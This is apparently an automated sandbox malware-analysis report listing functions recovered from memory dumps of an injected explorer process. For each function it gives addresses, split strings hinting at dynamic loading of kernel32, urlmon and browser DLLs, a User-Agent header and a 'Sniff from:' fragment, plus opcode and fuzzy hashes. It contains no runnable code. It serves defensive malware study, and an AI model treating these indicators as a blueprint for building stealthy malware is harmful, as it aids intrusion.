Function 0E46C86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

4, xrefs: 0E46C9E9
dll, xrefs: 0E46C8F4
vers, xrefs: 0E46C8E4
\, xrefs: 0E46C9E0
ion., xrefs: 0E46C8EC

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 965cf1904355b337f2427491caf3173424970fe5921d1ab66d9ae9ad2b7e9565
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 08414D30618B488BCB65EF2998957EBB7E5FB98301F41462F989EC7640EF30D94587C2

Function 107D686F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

\, xrefs: 107D69E0
4, xrefs: 107D69E9
dll, xrefs: 107D68F4
vers, xrefs: 107D68E4
ion., xrefs: 107D68EC

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 5e6679c4b2d85864a480e6214cbecc3af4ce12474e666c24310ef95ced66ecb1
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: D0417534619B4C8FCBA5EF6498457EA77E4FBD8301F51862E988EC7241EF30E5458782

Function 1092D86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

ion., xrefs: 1092D8EC
vers, xrefs: 1092D8E4
\, xrefs: 1092D9E0
dll, xrefs: 1092D8F4
4, xrefs: 1092D9E9

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: f7c83a0c0d83d55e5e367edcb05eff4e1d2a78f009ee72365d11bfece088a51b
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 9B416334219B488BCBA5EF349855BEBB3E4FB98301F51462E949ECB244DF30D545C782

Function 0E46E4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

cli., xrefs: 0E46E515
user, xrefs: 0E46E4D3
dll, xrefs: 0E46E51C
sspi, xrefs: 0E46E50E
32.d, xrefs: 0E46E4DA

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 6f2e0296d26393cda145a925c86f253ee6999458e3620fecea52b84647b60070
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: FD415E34A18E1D8FCB54EFA980947AE77E1FB58304F40456FA84AD7310EA71DA418BC6

Function 107D84B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

sspi, xrefs: 107D850E
dll, xrefs: 107D851C
32.d, xrefs: 107D84DA
cli., xrefs: 107D8515
user, xrefs: 107D84D3

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 2701613688c7b11e3af0ac6c5d8cb5c8ee0d390b01c26cdb89a613e70cc4ff1a
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 83417F30A18F0D8FCB84EF68E0997AD73E1FB68340F41456AA80ED7300DA70D9518B86

Function 1092F4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

sspi, xrefs: 1092F50E
cli., xrefs: 1092F515
user, xrefs: 1092F4D3
32.d, xrefs: 1092F4DA
dll, xrefs: 1092F51C

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: cc2e04464a1aa45fe70429b4ed028a2a2133287d7b89afe09706ebb2e309254e
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: F3417E30A18F0D8FCB84EF6894B57AD77E5FB58301F9102AEB80ED7214DA30D9408B86

Function 0E46C432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

.dll, xrefs: 0E46C53F
h, xrefs: 0E46C51F
kern, xrefs: 0E46C52A
el32, xrefs: 0E46C537

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 885f017ba22870123b5f6db38a722e039d20d1df7ab0b1841288dddb7b822814
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 68416270608B488FD7A9DF2984943ABFBE1FB98304F144A6F949EC3255DB70D945CB82

Function 107D6432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 107D652A
h, xrefs: 107D651F
.dll, xrefs: 107D653F
el32, xrefs: 107D6537

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 0dc46f3cfea956f52081b3b258d97aeff1a50ab0c827f13a68550238351d7034
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 1F41A670608B4D8FD795DF2990893AABBE1FB98300F104A2F959EC3255DF70D585CB81

Function 1092D432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

.dll, xrefs: 1092D53F
h, xrefs: 1092D51F
el32, xrefs: 1092D537
kern, xrefs: 1092D52A

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: d9943ed7aa7ab6be02163f43de784028cec730fc9a91c499c7ec28f5d4a6461d
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: D941C570608B4D4FD7A5DF2890943AAB7E1FBA8304F504A2FA49EC7269DF70D945CB81

Function 0E4730B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

f fr, xrefs: 0E47313D
Snif, xrefs: 0E473154
om:, xrefs: 0E473146
, xrefs: 0E473184

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: b1f17e36cd76c7f2dd3f6aa99c4a0d8ed41f8fe1440bf9790b31a873ff8989d7
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: BF31B071509B885FD71AEB29C4886EAB7D4FB94300F504D1FE4DBC7251EA30A949CA83

Function 107DD0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

f fr, xrefs: 107DD13D
Snif, xrefs: 107DD154
, xrefs: 107DD184
om:, xrefs: 107DD146

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: e6e795e1400fead65c89271fe0e1f126727a3e9179db63f972953f7506448cf3
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: BB31463150DB889FD71ADB38D4896DAB7D4FB94300F50491EE49BC7251EE30A54ACB43

Function 109340B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

om:, xrefs: 10934146
Snif, xrefs: 10934154
, xrefs: 10934184
f fr, xrefs: 1093413D

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 67c6e55e59e340e06dd507a1766ab728dccb951033714b337b25cf8d980d178c
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 4331CD7450CB886FD71ADB38C0957DAB7D4FB94300F90491EE4ABCB291EE34A54ACE42

Function 0E4730C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

f fr, xrefs: 0E47313D
Snif, xrefs: 0E473154
om:, xrefs: 0E473146
, xrefs: 0E473184

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: b6d4e123caff894af3cd3650bd52d2b560e114c8a6be73fb931f226c072d3c4c
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: B531AD71509B486FD71AEF29C4896EAB7D4FB94300F504D1FE4DBC7251EA30A90ACA83

Function 107DD0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

f fr, xrefs: 107DD13D
Snif, xrefs: 107DD154
, xrefs: 107DD184
om:, xrefs: 107DD146

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 30d09182489afb6bb3111ad3645c0f77d46b522b229b50d62d236bfe5fc9c3ed
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: ED31F271509B48AFD75ADB28D489AEAB7D4FB94300F40491EE49BC7351EE30E90ACB43

Function 109340C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

om:, xrefs: 10934146
Snif, xrefs: 10934154
, xrefs: 10934184
f fr, xrefs: 1093413D

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: fb92a568efcdc281cede3660ff2ffe4fca629161dbf5ba65f5d802fe31efe760
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: C031DE75508B486FD75ADB38C4957EAB7D4FBA4300F40491EE4ABCB291EE30F5468E42

Function 0E46EFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

hild, xrefs: 0E46EFF6
chro, xrefs: 0E46F023
.dll, xrefs: 0E46EFFE
me_c, xrefs: 0E46EFEE

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: f4a4e550113595b6a08f8ef116bec92ea8d0b1c9097273641ed7f968498ab3dd
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 80317070218B584FCB84EF299494BAAB7E1FB98300F94496FA48ECB214DF30C945C792

Function 107D8FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

.dll, xrefs: 107D8FFE
chro, xrefs: 107D9023
me_c, xrefs: 107D8FEE
hild, xrefs: 107D8FF6

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 7420d40fbee16c5fad5054e6ee8096e0206c49e6f63680d21904c721579d9b35
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: C4317034118B488FC785EF69A499BAAB7E1FF98300F90452DA84EC7325DF30E905C752

Function 1092FFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

chro, xrefs: 10930023
me_c, xrefs: 1092FFEE
.dll, xrefs: 1092FFFE
hild, xrefs: 1092FFF6

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 6e1e0ae8b248a7ffca11ce64bc26ac9d36905f7ad372ad574b832ce9fa976d07
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 9F317074118B484FC785DF6884A5BAAB7E1FBD8301F80466DA44ECF214DF30E905CB92

Function 0E46EFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

hild, xrefs: 0E46EFF6
chro, xrefs: 0E46F023
.dll, xrefs: 0E46EFFE
me_c, xrefs: 0E46EFEE

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 6972d0dfdb42d05f6bc0bdf7da33e64fd399882d1af94720c15687840466fc99
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: E3318F70218B584FCB84EF299494BAAB7E1FF98300F944A2F948ACB254DF30C945C792

Function 107D8FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

.dll, xrefs: 107D8FFE
chro, xrefs: 107D9023
me_c, xrefs: 107D8FEE
hild, xrefs: 107D8FF6

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: e58c4846a02e89d453b65d995da76363405b2e4e9eecbbd79fe3affe605fe4a2
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 11316F74118B488FC785DF68A499BAAB7E1FF98300F94462DA84ECB365DF30E905C752

Function 1092FFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

chro, xrefs: 10930023
me_c, xrefs: 1092FFEE
.dll, xrefs: 1092FFFE
hild, xrefs: 1092FFF6

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: cb8107d8d023f204b3eb0e36679e23f5b73c49188bb546f5f308fb9241a69f95
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 1C317C74218B484FC785DF6884A5BAAB7E1FBD8301F80462DA48ECF254DF30E905CB82

Function 0E4718C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

urlmon.dll, xrefs: 0E471959
on.d, xrefs: 0E471902
nt: , xrefs: 0E47191E
User-Agent: , xrefs: 0E471935, 0E471948

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 7aedf304df48b068098ac84105300ad3c7649692ca6505b91c20aa4f7a23b43c
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 2031C071614A5C8BCB15EFA9C8887EEB7E1FB58205F40062BD49ED7240DE788A45C7C9

Function 107DB8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 107DB935, 107DB948
nt: , xrefs: 107DB91E
urlmon.dll, xrefs: 107DB959
on.d, xrefs: 107DB902

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 266d1ce32dabd37ca1bcd3c330d0c792fdd60f331b10bbebde2a5771e529948a
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: E131E131614A4C8FCB45EFA9D8897EEBBE0FF68204F40022AE44ED7240DF789645C789

Function 109328C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 10932935, 10932948
on.d, xrefs: 10932902
urlmon.dll, xrefs: 10932959
nt: , xrefs: 1093291E

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 89b1a633782a929194650977912edcb27df5590ab64ae4c956e5ee3c50f5b624
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: F831DF31614A0C8FCB45EFB8C8957EEB7E0FB58205F40022EE85EDB240DE789645CB89

Function 0E4718BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

urlmon.dll, xrefs: 0E471959
on.d, xrefs: 0E471902
nt: , xrefs: 0E47191E
User-Agent: , xrefs: 0E471935, 0E471948

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 00758a0abae4af326b062552c8d3d6f9f7640290ade57b659741ac0a0005573e
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 5E21BF71614A5C8ACB15EFA9C8887EEBBE1FB58205F40462FD49AD7340DE748A05C7C9

Function 107DB8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 107DB935, 107DB948
nt: , xrefs: 107DB91E
urlmon.dll, xrefs: 107DB959
on.d, xrefs: 107DB902

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: e2b4739b74ec9740d00cc43e0ee2161445bd7ab50f5c4676cef38dc8f22e3290
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 4D21D270610A4CCFCB05EFA9D8997EEBBE0FF68204F40422AE45AD7240DF749645CB89

Function 109328BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 10932935, 10932948
on.d, xrefs: 10932902
urlmon.dll, xrefs: 10932959
nt: , xrefs: 1093291E

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: c0db7662ed5bd30412a5b96db784d1860e503a89c2f12f5c574b752a4ac411a2
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: AA21C170610A4C8ACB05EFB8C8A57EEBBE4FF58205F40422EE45ADB240DE749645CB89

Function 0E472E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 0E472EF4
., xrefs: 0E472F1F
l, xrefs: 0E472F26
l, xrefs: 0E472F03

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 888d2a3ec8adced2fddb6cd8e011a2e96c5af1f29874cb2b0832a7071060a8f9
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 6C215C70A24A0D9BDB08EFA9D0487EABBF1FB18304F504A2FD049D3600DB7499518BC4

Function 0E472E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 0E472EF4
., xrefs: 0E472F1F
l, xrefs: 0E472F26
l, xrefs: 0E472F03

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: d357a22e09da4207fdda22ef979e55ffbe40abdfd892c83cfd4d217744d489e8
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: F1214B70A24B0D9FDB48EFA9D0487EABAF1FB58304F504A2FD049D3610DB7499918BC4

Function 107DCE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 107DCF1F
t, xrefs: 107DCEF4
l, xrefs: 107DCF26
l, xrefs: 107DCF03

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 7e8a2b78b275b750a5bf083eeace5669928e6ba1e50e872c910c6a319bb545d2
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 19215C74A24A0D9FDB44EFA8D4497EDBBF1FB18314F50462EE109E3610DB74A5528B84

Function 107DCE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

